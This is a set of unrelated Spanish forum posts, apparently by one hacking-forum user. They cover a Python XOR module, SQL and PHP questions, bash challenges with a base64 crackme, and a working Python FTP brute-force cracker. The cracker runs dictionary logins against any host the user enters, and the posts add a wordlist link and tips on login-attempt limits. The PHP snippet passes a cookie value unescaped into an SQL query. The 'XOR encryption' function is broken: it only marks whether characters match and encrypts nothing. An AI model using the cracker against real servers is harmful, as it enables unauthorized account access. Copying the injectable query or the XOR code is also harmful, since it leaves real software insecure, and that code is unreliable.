Buenas compañeros .

Estaba buscando alguna forma de cifrar un binario mediante Xor en Python y no he encontrado ninguna forma ( no sé si la habrá, puede ser que si ), el caso es que he preferido crearme yo un módulo propio por si acaso lo tengo que utilizar más veces.

Os dejo aquí el código, por si alguna vez lo necesitáis no tenéis más que buscar por el foro .

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Modulo des/encriptacion clave Xor.
 
def xor_dencrypt(informacion,clave):
	encrypted = ""
	x = 0
	if (len(informacion) == len(clave)):
		while (x<len(informacion)):
			if (informacion[x] == clave[x]):
				encrypted = encrypted + str(0)
			else:
				encrypted = encrypted + str(1)
			x += 1
	else:
		print "La longitud de la clave no coincide con la informacion a cifrar"
	return encrypted
 

Para poder llamarlo únicamente importáis el módulo como cualquier otro y llamáis a la función xor_dencrypt, enviándole como parámetros la información a cifrar y la clave.

Para descifrar no he hecho ninguna función porque es únicamente un cifrado de la información ya cifrada, así que no vale la pena

Un saludo, Runex.

Buenas compañeros, no sé que me ha pasado pero se me ha ido de la cabeza la forma de usar truncate xD.

El caso es que para vaciar un usuario en concreto de una tabla de usuarios, si no recuerdo mal, utilizaba:

TRUNCATE TABLE usuarios WHERE nombre="usuario";

Sin embargo esto me lanza el típico error:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where nombre="usuario"' at line 1

Y claro a éstas horas es difícil ya pensar, además buscando en google no he encontrado ningún caso en el que se utilice truncate con la condición where.

¿ Como se realizaría esa consulta ?.

Ya sé que también puedo vaciar el registro con

UPDATE usuarios SET xxx=xxx WHERE nombre="usuario";

pero tengo la espina clavada del truncate xD.

Un saludo, Runex

Buenas compañeros, estaba haciendo un bruteforce ftp con python, pero tengo un par de problemas, uno de los cuales es la velocidad y otro el límite establecido de logueos fallidos. ¿ Alguna Idea ?

EDIT: Por lo visto el problema de la velocidad solo se da en algunos servers, en servidores que no tienen límite de intentos fallidos, funciona perfectamente .
Resuelto el problema de los límites de fallos

Aquí os dejo el link con un diccionario de 3mb en texto plano ( hay bastantes ), utilizad el mismo diccionario para los usuarios y los passwords, solo tenéis que hacer una copia y renombrarla a passwords.txt: https://rapidshare.com/files/4215115057/usuarios.txt

Tened en cuenta también que en los ftp públicos toda cuenta que tenga como user "anonymous" es válida xD.

Si os interesa que le aplique interfaz gráfica decidmelo .

Este es el código:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ftplib
 
class ftp_brute_force:
	def __init__(self,conectftp,target):
		self.listausuarios,self.listapasswords,self.conectftp,self.target,self.contadorus,self.contadorpas = ([],[],conectftp,target,0,0)
		print "\n[+] Cargando los diccionarios,esto puede tardar unos segundos... [+]"
		try:
			self.users = open("usuarios.txt","r")
			self.passwords = open("passwords.txt","r")
		except:
			print "\n	[-] No existen los diccionarios"
			exit()
		for self.user in self.users.readlines():
			self.listausuarios.append(self.user)
			self.contadorus += 1
		for self.password in self.passwords.readlines():
			self.listapasswords.append(self.password)
			self.contadorpas += 1
		self.users.close()
		self.passwords.close()
		print "\n[+] Diccionarios Cargados: " + str(self.contadorus) + " Usuarios y " + str(self.contadorpas) + " Passwords [+]"
		print "\n[+] Combinaciones posibles: " + str(self.contadorus*self.contadorpas) +" [+]"
		print "\n[+] Ataque iniciado,puede llevar bastante tiempo, no cierre el programa [+]\n\n"
		self.bruteforce()
	def bruteforce(self):			
		for self.user in self.listausuarios:
			for self.password in self.listapasswords:
				try:
					self.conectftp.login(self.user,self.password)
					print "Los datos son --> " + self.user + " y " + self.password
					self.conectftp.quit()
					self.conectftp.close()
					self.conectftp = ftplib.FTP(self.target)
					raw_input()						
				except:
					print self.user + " y " + self.password + " no son correctos"
					self.conectftp.quit()
					self.conectftp.close()
					self.conectftp = ftplib.FTP(self.target)
 
		print " [-] No se han podido extraer datos."
 
if __name__ == '__main__':
	print "			[+]   FTP CRACKER BY RUNE   [+]\n\n\n"
	target = raw_input("\n\nIntroduce el target [+] > ")
	try:
		conectftp = ftplib.FTP(target)
	except:
		print "	\n[-] No existe el target"
		exit()
	instancia = ftp_brute_force(conectftp,target)
 
 
 

Por cierto, para amenizar la impresión por pantalla quería hacer tipo un contador que vaya subiendo por cada usuario y contraseña probado, sin que cambie de posición en pantalla, que se vaya actualizando, algo así:

0/10000 y que cuando pruebe 1 cambie a 1/10000 sin imprimirse en otra linea.

¿ Se os ocurre algo ?

Eso es todo compañeros, espero vuestra ayuda, un saludo, Runex

No sé por qué motivo no me deja instalar xulrunner para poder correr websecurify. El error que me lanza es éste:


El paquete xulrunner-2.0 no está disponible, pero algún otro paquete hace referencia
a él. Esto puede significar que el paquete falta, está obsoleto o sólo se
encuentra disponible desde alguna otra fuente

E: El paquete «xulrunner-2.0» no tiene un candidato para la instalación


Alguna idea?

Es el mismo reto que el planteado por EleKtro pero en bash, así que dificultad ninguna .

Nombre:      It's a dir?
Dificultad:     2/10
Objetivo:      Diferenciar entre directorios y archivos
Indicaciones:
Ejemplo:    

Solución: http://pastebin.com/Z6WTYpAS

Solucionado:

1-> Leo Gutiérrez

Nombre:      Generador
Dificultad:     2/10
Objetivo:      Calcular el tiempo de generación.
Indicaciones: El mensaje de salida debe indicar la cantidad de números generados.
Pistas:    Tampoco

Ejemplo:

El primer crackme que inicia los retos Bash  
Es muy simple y aquí teneis las indicaciones:


Nombre:      Crackme Rune
Dificultad:     3/10
Objetivo:      Loguearse.
Indicaciones: Ninguna, es muy simple
Pistas:    Al final del code, está vuestra pista

IyEvYmluL2Jhc2gKZWNobyAnSW5zZXJ0ZSBlbCB1c3VhcmlvJwpyZWFkIEEKeDU9NjUKeDY9NDUK
eDc9MzQKcD0keDYkeDckeDUKaWYgWyAkQSAhPSAkcCBdCnRoZW4KZWNobyAnTWFsJwpzbGVlcCAz
cwplbHNlCmVjaG8gJ1VzdWFyaW8gQ29ycmVjdG8nCmVjaG8gJ0EgY29udGludWFjaW9uIGluc2Vy
dGUgbGEgY29udHJhc2XDsWEnCngxPTEKeDI9NAp4Mz01Ngp4ND0yMwp4PSR4MSR4MyR4MiR4NApy
ZWFkIHBhc3MKaWYgWyAkcGFzcyA9ICR4IF0gCnRoZW4KZWNobyAnQ29udHJhc2XDsWEgY29ycmVj
dGEsIGFjY2VkaWVuZG8gYWwgcGFuZWwnCnNsZWVwIDRzCmV4aXQgMAplbHNlCmVjaG8gJ0NvbnRy
YXNlw7FhIGluY29ycmVjdGEnCnNsZWVwIDRzCmV4aXQKZmkKZmkKCg==

Completados:

1->RyogiShiki

Bueno, últimamente se han puesto de moda por el foro los retos Batch, así que no estaría mal que se viesen por aquí, retos en distintos lenguajes scripting.

Así, para gozar de una buena organización y orden , seguiremos el mismo esquema planteado por mi compañero EleKtro H@cker

Formato para publicar un reto:


Formato para publicar un crackme:


Las normas, las podéis encontrar en el post de EleKtro:

http://foro.elhacker.net/scripting/iquestquieren_retos_de_batch-t360401.0.html

Eso es todo y un saludo

El código es el siguiente:

 <?php 
if(isset($_POST["usuariox"]) and isset($_POST["passwordx"]))
{
	if($_POST['usuariox'] == "neo" and $_POST['passwordx'] == "matrixrevolution")
	{
			?>
			<script type="text/javascript">
			alert("Todo correcto, reto superado")
			</script>
			<META HTTP-EQUIV="REFRESH" CONTENT="0;URL="****">	
			<?php
			$usuario = $_COOKIE['Usuario'];
			$conect = mysql_connect("***","****","***") or die("Problemas en la db");
			mysql_select_db("***") or die("Problemas en a tablaa");
			$consulta = mysql_query("update usuarios set superados = superados + 1 where nombre='$usuario'") or die("Problemas en la consulta");
	}
	else 
	{
			?>
			<script type="text/javascript">
			alert("Respuesta Incorrecta")
			</script>
			<?php
	}
}
} // Esta llave viene de un if, que hay más arriba del código para la comprobación de las cookies.
else 
{
	?>
	<script type="text/javascript" >
	alert("Tienes que estar registrado!");
	</script>
	<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=***">
	<?php
}

No sé porque pero siempre me da como superado el reto, por mucho que inserte datos erróneos :S. Os agradecería que me aviséis si encontráis algún fallo lógico, error o cualquier cosa que pueda ocasionar el problema.

Podéis cerrar el tema, ya está corregido
Un saludo

Buenas compañeros, estaba acabando mi web y me interesaba ponerle un pie de página, el problema es que no sé css y no lo voy a utilizar para nada más que para esta situación, de momento claro. ¿Necesito css obligatorio para establecer una imágen fija como pie de página? o ¿Hay alguna solución con html?. En caso de que sepáis como co**** se puede hacer esto, os pido una ayudita .


Un saludo compañeros